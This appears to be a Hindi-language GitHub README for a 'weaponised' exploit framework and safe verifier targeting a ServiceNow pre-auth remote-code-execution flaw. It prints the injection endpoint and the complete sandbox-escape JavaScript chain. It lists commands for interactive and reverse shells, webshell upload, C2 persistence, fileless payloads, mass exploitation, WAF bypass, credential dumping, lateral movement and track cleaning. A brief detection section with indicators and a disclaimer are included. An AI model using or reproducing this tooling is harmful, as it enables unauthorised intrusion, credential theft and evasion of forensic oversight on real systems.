
CVE-2026-6875 ServiceNow प्री-ऑथ RCE फ्रेमवर्क 🔥 JS इंजेक्शन → सैंडबॉक्स एस्केप → RCE → रूट। विशेषताएं: --detect, --exec, रिवर्स/इंटरैक्टिव शेल, बैच थ्रेडिंग, WAF बायपास, दृढ़ता, पार्श्व आंदोलन, क्रेडेंशियल डंप, फाइललेस निष्पादन, साफ ट्रैक। 🛡️ CVSS 9.5 सक्रिय रूप से शोषित। केवल अधिकृत और कानूनी उपयोग। कानूनी रहें। 🔒

Exploit Framework & Safe Verifier
For authorized security testing only.
यह टूल केवल शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
लेखक और योगदानकर्ता इस सॉफ़्टवेयर के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं। उपयोगकर्ता पूरी तरह से यह सुनिश्चित करने के लिए जिम्मेदार हैं कि परीक्षण से पहले उनके पास लक्ष्य मालिक से स्पष्ट लिखित अनुमति हो। कंप्यूटर सिस्टम में अनधिकृत पहुंच कंप्यूटर फ्रॉड एंड एब्यूज़ एक्ट (CFAA) और दुनिया भर में समान कानूनों के तहत अवैध है।
इस सॉफ़्टवेयर का उपयोग करके, आप सहमत होते हैं:
⚠️ चेतावनी: इस कमज़ोरी का सक्रिय रूप से वास्तविक दुनिया में शोषण किया जा रहा है। अनधिकृत उपयोग के गंभीर कानूनी परिणाम हो सकते हैं।
CVE-2026-6875 ServiceNow AI Platform (पूर्व में Now Platform) में एक गंभीर बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) कमज़ोरी है। यह हमलावरों को स्क्रिप्ट सैंडबॉक्स को बायपास करने और ServiceNow एप्लिकेशन के विशेषाधिकारों के साथ मनमाना सिस्टम कमांड निष्पादित करने की अनुमति देती है।
JavaScript इंजेक्शन: assessment_thanks.do एंडपॉइंट sysparm_assessable_type पैरामीटर स्वीकार करता है। मान को javascript: से उपसर्ग करके, एक हमलावर मनमाना JavaScript कोड इंजेक्ट करता है।
सैंडबॉक्स एस्केप: एक परिष्कृत सैंडबॉक्स-एस्केप गैजेट (DiscoveryFunctions.getCacheObjectForTable, AbstractAjaxProcessor, और Class.create को चेन करके) JavaScript सैंडबॉक्स प्रतिबंध को हटा देता है।
रिमोट कोड निष्पादन: इंजेक्ट किया गया Java कोड (java.lang.Runtime.exec() के माध्यम से) ServiceNow एप्लिकेशन विशेषाधिकारों के साथ चलता है, जिससे पूर्ण सिस्टम समझौता संभव होता है।
विशेषाधिकार वृद्धि: पोस्ट-एक्सप्लॉइटेशन मॉड्यूल sudo misconfigurations, SUID बाइनरी, लिखने योग्य क्रॉन जॉब्स या कर्नेल एक्सप्लॉइट के माध्यम से रूट तक विशेषाधिकार बढ़ाने का प्रयास करते हैं।
exploit.py)पूर्ण हथियारबंद एक्सप्लॉइट JavaScript इंजेक्शन और सैंडबॉक्स एस्केप को चेन करके रिमोट कोड निष्पादन प्राप्त करता है, जिसमें पर्सिस्टेंस, लैटरल मूवमेंट और क्रेडेंशियल डंपिंग के लिए उन्नत पोस्ट-एक्सप्लॉइटेशन मॉड्यूल शामिल हैं।
verifier.py)सुरक्षित सत्यापक हानिकारक पेलोड निष्पादित किए बिना या सिस्टम परिवर्तन किए बिना गैर-आक्रामक कमज़ोरी का पता लगाने का कार्य करता है।
pip (requests लाइब्रेरी के लिए)pip install requests urllib3
[!NOTE]
exploit.pyमूल कार्यक्षमता के लिए केवल मानक लाइब्रेरी का उपयोग करता है;requestsकेवल--detectसुविधा,--webhookसूचनाओं और सुरक्षित सत्यापक के लिए आवश्यक है।
verifier.py)# एकल लक्ष्य सत्यापन
python verifier.py -u 192.168.1.100
# कस्टम पोर्ट और पथ
python verifier.py -u 10.0.0.5 -p 8443 --path /snow
# फ़ाइल से बड़े पैमाने पर स्कैन
python verifier.py -l targets.txt -o results.json
# शांत मोड (केवल कमज़ोर लक्ष्य)
python verifier.py -u 192.168.1.100 -q
# धीमे लक्ष्यों के लिए टाइमआउट बढ़ाएँ
python verifier.py -u servicenow.example.com --timeout 60
# कस्टम User-Agent
python verifier.py -u 192.168.1.100 --user-agent "MyScanner/1.0"
# लक्ष्य पर इंटरैक्टिव शेल
python exploit.py -u 192.168.1.100
# एकल कमांड निष्पादित करें
python exploit.py -u 192.168.1.100 --exec "id && whoami"
# एक फ़ाइल पढ़ें
python exploit.py -u 192.168.1.100 --read-file /etc/passwd
# शोषण से पहले पहचान सक्षम करें
python exploit.py -u 192.168.1.100 --detect
# रूट विशेषाधिकार वृद्धि का प्रयास करें
python exploit.py -u 192.168.1.100 --privesc
# एक वेबशेल अपलोड करें
python exploit.py -u 192.168.1.100 --upload shell.jsp
# C2 के साथ पर्सिस्टेंस स्थापित करें
python exploit.py -u 192.168.1.100 --persistence --c2-host 10.0.0.5 --c2-port 4444
# एक्सप्लॉइट के बाद ट्रैक साफ़ करें
python exploit.py -u 192.168.1.100 --clean
# फ़ाइललेस (मेमोरी) पेलोड का उपयोग करें
python exploit.py -u 192.168.1.100 --fileless --c2-host 10.0.0.5 --c2-port 4444
# फ़ाइल से बड़े पैमाने पर शोषण (50 थ्रेड)
python exploit.py -l targets.txt -m 50 --exec "uname -a"
# कस्टम कॉलबैक सर्वर पोर्ट
python exploit.py -u 192.168.1.100 --callback-port 9090
# WAF बायपास तकनीक सक्षम करें
python exploit.py -u 192.168.1.100 --waf-bypass
# वेबहुक के माध्यम से सूचनाएँ भेजें
python exploit.py -u 192.168.1.100 --webhook https://myhook.com/snow
# पाइप मोड (stdin से कमांड पढ़ें)
echo "cat /etc/hosts" | python exploit.py -u 192.168.1.100
# कस्टम पोर्ट और पथ
python exploit.py -u 10.0.0.5 -p 8443 --path /snow
# स्व-हस्ताक्षरित प्रमाणपत्रों के लिए TLS सत्यापन अक्षम करें
python exploit.py -u 192.168.1.100 --insecure-tls
# कस्टम टाइमआउट और पुनर्प्रयास
python exploit.py -u 192.168.1.100 -t 60 -r 5 -d 2.0
⚠️ महत्वपूर्ण: ServiceNow क्लाउड इंस्टेंस स्वचालित रूप से पैच हो जाते हैं। यह कमज़ोरी मुख्य रूप से सेल्फ़-होस्टेड डिप्लॉयमेंट को प्रभावित करती है।
कमज़ोरी assessment_thanks.do एंडपॉइंट में निहित है, जो sysparm_assessable_type पैरामीटर स्वीकार करता है। javascript: से शुरू होने वाला मान प्रदान करके, प्लेटफ़ॉर्म सिस्टम संदर्भ में बाद के JavaScript का मूल्यांकन करता है।
कमज़ोर एंडपॉइंट:
POST /assessment_thanks.do sysparm_assessable_type=javascript:gs.print('test')
इंजेक्ट किया गया कोड शुरू में एक सैंडबॉक्स तक सीमित होता है। हालांकि, निम्नलिखित श्रृंखला का शोषण करके:
javascript:
var s="<payload>";
DiscoveryFunctions.getCacheObjectForTable=Object;
var a={};a.get=Object;
var b=new AbstractAjaxProcessor();
b.initialize=DiscoveryFunctions.getFirstValueFromTable(
a,"",DiscoveryFunctions.getFirstValueFromTable(
a,"",DiscoveryFunctions.getFirstValueFromTable(
a,"",global,"WorkflowIconsSCR",""),"prototype",""),"initialize","");
b.a=Class.create();b.a(s);
सैंडबॉक्स बायपास हो जाता है, जिससे java.lang.Runtime जैसी Java कक्षाओं तक पूर्ण पहुंच मिल जाती है।
पासवर्ड, API कुंजी और रहस्यों के लिए .properties, .xml, .conf फ़ाइलों की खोज करता है:
/opt/ServiceNow/conf/*.xml/var/log/ServiceNow/*.log/etc/passwd, /etc/shadowइसके माध्यम से बैकडोर स्थापित करता है:
*/5 * * * *), systemd सेवाएँ, SSH कुंजियाँschtasks), रजिस्ट्री रन कुंजियाँअन्य ServiceNow इंस्टेंस या SSH होस्ट के लिए स्थानीय सबनेट स्कैन करता है, खोजे गए क्रेडेंशियल का पुन: उपयोग करता है।
एक Java क्लास को तुरंत संकलित करता है, इसे ClassLoader के माध्यम से लोड करता है, और मेमोरी में निष्पादित करता है (कोई डिस्क राइट नहीं)।
{/*comment*/})\u0077 w के लिए)ne\u0077 new के लिए)अपने ServiceNow लॉग में निम्नलिखित खोजें:
extraweb_access.log – /assessment_thanks.do के लिए अनुरोध जिसमें sysparm_assessable_type शामिल है:
javascript:DiscoveryFunctions.getCacheObjectForTableAbstractAjaxProcessor/var/tmp/ में अप्रत्याशित फ़ाइलें (जैसे, shell.jsp, .sh स्क्रिप्ट)/etc/passwd, /etc/shadow, या ~/.ssh/authorized_keyscrontab -l)/etc/systemd/system/)/bin/bash -i, nc, curl, wget, python -c)[+] CVE-2026-15409/15410 - SonicWall SMA1000 मल्टी-एक्सप्लॉइट फ्रेमवर्क
https://github.com/tc4dy/CVE-2026-15409-15410-Framework
[+] CVE-2026-41091 - SolarFlare (RedSun) Microsoft Defender LPE
https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit
[+] CVE-2026-57821 - Apache Fineract SQL इंजेक्शन टूलकिट
https://github.com/tc4dy/CVE-2026-57821-PoC-Exploit
[+] CVE-2026-41940 - cPanel/WHM प्रमाणीकरण बायपास
https://github.com/tc4dy/CVE-2026-41940-PoC-Exploit
| विशेषता | मान |
|---|
| 📅 खोज | 1 अप्रैल, 2026 (Searchlight Cyber) |
| ⚠️ CVSS स्कोर | 9.5 (गंभीर) |
| 📋 CISA KEV | 13 जुलाई, 2026 को जोड़ा गया |
| 🎯 प्रभावित उत्पाद | सेल्फ़-होस्टेड ServiceNow AI Platform |
| 🔄 फिक्स्ड वर्ज़न | Brazil EA/GA, Australia Patch 2, Zurich Patch 7b/9, Yokohama Patch 12 Hot Fix 1b/13 |
| 🔓 प्रमाणीकरण | आवश्यक नहीं (Pre‑Auth) |
| 🌍 सक्रिय शोषण | वास्तविक दुनिया में पुष्टि (जुलाई 2026) |
| विशेषता | विवरण |
|---|
| 🚀 JavaScript इंजेक्शन | sysparm_assessable_type पैरामीटर के माध्यम से पेलोड इंजेक्ट करता है। |
| 💻 सैंडबॉक्स एस्केप | मनमाना Java कोड चलाने के लिए ServiceNow के स्क्रिप्ट सैंडबॉक्स को बायपास करता है। |
| 🔐 इंटरैक्टिव शेल | कई कमांड के समर्थन के साथ एक लाइव शेल स्पॉन करता है। |
| 👑 रूट प्रिवेस्क | sudo misconfigurations, SUID बाइनरी और क्रॉन जॉब्स की जाँच करता है। |
| 📁 फ़ाइल ऑपरेशन | वेबशेल अपलोड करता है, base64 एन्कोडिंग के माध्यम से फ़ाइलें पढ़ता/डाउनलोड करता है। |
| 🌐 बैच स्कैनिंग | थ्रेडिंग (-l फ़्लैग) के साथ एक साथ कई लक्ष्यों का शोषण करता है। |
| 🎯 सुरक्षित डिटेक्शन | गैर-आक्रामक कमज़ोरी सत्यापन के लिए वैकल्पिक --detect फ़्लैग। |
| ⚙️ WAF बायपास | WAF/IDS से बचने के लिए अंतर्निहित अस्पष्टीकरण तकनीकें (6 तकनीकें)। |
| 🧩 पर्सिस्टेंस | क्रॉन/systemd/schtasks बैकडोर स्थापित करता है। |
| 🔍 लैटरल मूवमेंट | अन्य कमज़ोर होस्ट के लिए स्थानीय नेटवर्क स्कैन करता है और SSH/SSRF प्रसार का प्रयास करता है। |
| 🧹 ट्रैक साफ़ करना | लॉग, bash हिस्ट्री और ऑडिट ट्रेल हटाता है। |
| 💾 फ़ाइललेस निष्पादन | डिस्क पर लिखे बिना मेमोरी-रेजिडेंट पेलोड चलाने के लिए Java ClassLoader का उपयोग करता है। |
| 🔌 कॉलबैक सर्वर | कमांड आउटपुट प्राप्त करने के लिए अंतर्निहित HTTP सर्वर (वैकल्पिक)। |
| 📢 वेबहुक सूचनाएँ | परिणाम कस्टम URL (Slack, Discord, आदि) पर भेजता है। |
| 🪟 क्रॉस-प्लेटफ़ॉर्म | Linux और Windows लक्ष्यों (cmd.exe / PowerShell) का समर्थन करता है। |
| 🔒 थ्रेड-सेफ़ | समवर्ती संचालन के लिए लॉकिंग तंत्र का उपयोग करता है। |
| 📊 संस्करण पहचान | ServiceNow संस्करण (Zurich/Brazil/Australia/Yokohama) का पता लगाता है। |
| कमांड | विवरण |
|---|
exec <cmd> | सिस्टम कमांड निष्पादित करें |
upload <local> [remote] | लक्ष्य पर वेबशेल अपलोड करें |
download <remote> | फ़ाइल सामग्री डाउनलोड और प्रदर्शित करें |
privesc | विशेषाधिकार वृद्धि का प्रयास करें |
reverse <host> <port> | रिवर्स शेल भेजें |
dumpcred | ServiceNow कॉन्फ़िगरेशन से क्रेडेंशियल डंप करें |
persist <host> <port> | पर्सिस्टेंस स्थापित करें (cron/systemd/schtasks) |
lateral | लैटरल मूवमेंट का प्रयास करें |
clean | ट्रैक साफ़ करें (लॉग, हिस्ट्री) |
memory <host> <port> | फ़ाइललेस Java पेलोड निष्पादित करें |
exit | इंटरैक्टिव शेल से बाहर निकलें |
| विशेषता | विवरण |
|---|
| 🔍 ServiceNow पहचान | एकाधिक एंडपॉइंट के माध्यम से ServiceNow इंस्टेंस की पहचान करता है। |
| 📊 संस्करण पहचान | विशिष्ट ServiceNow रिलीज़ और पैच स्तर का पता लगाता है। |
| 🧪 JavaScript इंजेक्शन परीक्षण | सुरक्षित gs.print() पेलोड का उपयोग करके इंजेक्शन कमज़ोरी का परीक्षण करता है। |
| 🔒 सैंडबॉक्स एस्केप परीक्षण | विनाशकारी कमांड के बिना सैंडबॉक्स एस्केप की पुष्टि करता है। |
| 📈 विश्वास स्कोरिंग | साक्ष्य के आधार पर विश्वास प्रतिशत (85‑95%) प्रदान करता है। |
| 📋 JSON आउटपुट | रिपोर्टिंग के लिए JSON प्रारूप में परिणाम निर्यात करता है। |
| 🔄 बड़े पैमाने पर स्कैनिंग | थ्रेडिंग समर्थन के साथ एक साथ कई लक्ष्य स्कैन करता है। |
| 🎯 गैर-आक्रामक | सिस्टम जानकारी के लिए केवल हानिरहित uname -a निष्पादित करता है। |
| ServiceNow रिलीज़ | कमज़ोर संस्करण | फिक्स्ड संस्करण |
|---|
| Brazil | EA, GA | पैच (GA के बाद) |
| Australia | Patch 2 से पहले | Patch 2+ |
| Zurich | Patch 7b, Patch 9 से पहले | Patch 7b, Patch 9+ |
| Yokohama | Patch 12 Hot Fix 1b से पहले | Patch 12 Hot Fix 1b, Patch 13 |
| अन्य रिलीज़ | अज्ञात | आधिकारिक सलाह देखें |